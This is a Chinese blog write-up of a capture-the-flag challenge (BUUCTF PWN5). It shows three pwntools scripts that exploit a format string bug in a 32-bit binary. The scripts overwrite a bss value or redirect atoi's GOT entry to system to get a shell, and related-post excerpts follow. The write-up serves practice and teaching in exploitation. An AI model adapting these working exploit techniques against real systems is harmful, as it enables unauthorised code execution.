[第五空间2019 决赛]PWN5——三种方法

最新推荐文章于 2025-06-20 09:45:53 发布
最新推荐文章于 2025-06-20 09:45:53 发布
阅读量580 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: java 前端 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/132135383
文章讲述了针对32位程序中IDAGOT表可写栈溢出的三种攻击方法,包括使用formatstring攻击获取密码、修改atoiGOT表指向system地址以获取shell,以及利用bss段地址进行多次payload发送的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.检查保护机制

        

  • 32位IDA

  • GOT表可写

  • 栈溢出保护开启

  • 堆栈不可执行

  • 地址随机化未开启

2.使用32位IDA打开该ELF文件

  • main函数
    •  

偏移量为10,32为是栈地址,64位是寄存器

 

 

3.EXP

  • 方法一
    • 思路:
    • 1.在bss段地址输入格式化字符串%10$n
    • 2.atoi把字符转换为整型
    • 3.密码发送str(4),因为网bss段输入了”%10$n“长度为4

     

    #encoding = utf-8
from pwn import*
context(os = 'linux',arch = 'i386',log_level = 'debug')
#p = remote("node4.buuoj.cn",27532)
p = process("./pwn")
bss = 0x0804C044

payload = p32(bss) + b'%10$n'
p.sendline(payload)
p.recvuntil("your passwd:")
#gdb.attach(p)
p.sendline(str(4))


p.interactive()

 

  • 方法二
    • 思路:
    • 1.修改atoi的got表为system地址
    • 2.再发送“/bin/sh”,就可以拿到权限了 
#encoding = utf-8
from pwn import*
context(os = 'linux',arch = 'i386',log_level = 'debug')
p = remote("node4.buuoj.cn",25646)
bss = 0x0804C044
elf = ELF("./pwn")
atoi_addr = elf.got['atoi']
system_addr = elf.plt['system']
payload = fmtstr_payload(10,{atoi_addr:system_addr})
p.sendline(payload)
p.send("/bin/sh\x00")
p.interactive()

 

  • 方法三
    •  思路
    • 1.偏移量为10
    • 2.bss段地址为:0x0804C044
    • 3.bss段地址值为:0x10101010
    • 4.发送payload后,再发送密码:0x10101010
    • 5.%10$n显示的是bss的地址,%11$n显示的是bss+1的地址......

 

#encoding = utf-8
from pwn import*
context(os = 'linux',arch = 'i386',log_level = 'debug')
p = remote("node4.buuoj.cn",25646)
bss = 0x0804C044
elf = ELF("./pwn")
payload = p32(bss) + p32(bss+1) + p32(bss+2) + p32(bss+3) + b"%10$n%11$n%12$n%13$n"
p.sendline(payload)
p.recvuntil("your passwd:")
#gdb.attach(p)
p.send(str(0x10101010))

p.interactive()

 

 

L__y
关注
[第五空间2019 决赛]PWN5
qq_45913417的博客
11-18 1896
判断附件相关信息: Arch:i386-32-little:32位小端序(数值低位放在内存低地址) 保护机制: 咲夜南梦师傅: Linux-编译保护 | 咲夜南梦’s 博客 (196011564.github.io) 利用格式化字符串漏洞覆盖dword_804C044处内存,输入passwd时使if判断句成立即可调用后门函数获取系统权限。 格式化字符串漏洞: 原理介绍 - CTF Wiki (ctf-wiki.org) 栈:第一个变量为返回地址,第二个变量为格式化字符串,第三个变量开始为参数,相
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4902
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
BUUCTF-[第五空间2019 决赛]PWN5详解
最新发布
2301_76794844的博客
06-20 1203
BUUCTF-[第五空间2019 决赛]PWN5详解
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 682
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 514
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
PWN · ret2libc | protobuf】[2024CISCN · 华中赛区]protoverflow
Mr_Fmnwon的博客
06-27 1170
第一次遇到protobuf,如果没有了解过,是显然做不出来的。此次复现,也算是点亮了一个技能点Protocol Buffers,是Google公司开发的一种数据描述语言,类似于XML能够将结构化数据序列化,可用于数据存储、通信协议等方面。常用于跨平台和异构系统中进行RPC调用,序列化和反序列化效率高且体积比XML和JSON小得多,非常适合网络传输。为了能够和程序进行交互,我们需要先逆向分析得到Protobuf结构体,然后构造序列化后的Protobuf与程序进行交互。具体不如参考PWN佬。
buuctf刷题——[OGeek2019]babyrop 1
qq_41560595的博客
03-14 4041
好久好久没做ctf题了,今天得空刷刷buuctf,emm,发现好多都忘了。???????????? 查看权限 不能利用shellcode,但可以构造栈溢出。 查看源程序 为了方便区分,重命名了下函数。 open函数的返回值:如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1; 文件描述符:0,1,2是标准IO输入/输出/错误输出给占用了,当文件open成功了,会返回数值3; read(fd,&buf,4u)是把fd所指向的随机数写入到buf文件中,长度是4个字节。 此时,buf是
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 319
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 552
[buuctf][第五空间2019 决赛]PWN5
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 563
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 546
完全通过静态分析得到题解,与网传算法不同
BUUCTF 第五空间2019 pwn5(格式化字符串)
菜的只能随便写写博客
02-02 1101
0x01 文件分析 32位elf 无PIE   0x02 运行  运行文件之后,出现两处输入,一个name和一个passwd,并且name的输入有回显,则有可能是栈漏洞和格式化字符串。   0x03 IDA查看 IDA F5反汇编之后的代码: int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 ...
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1897
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值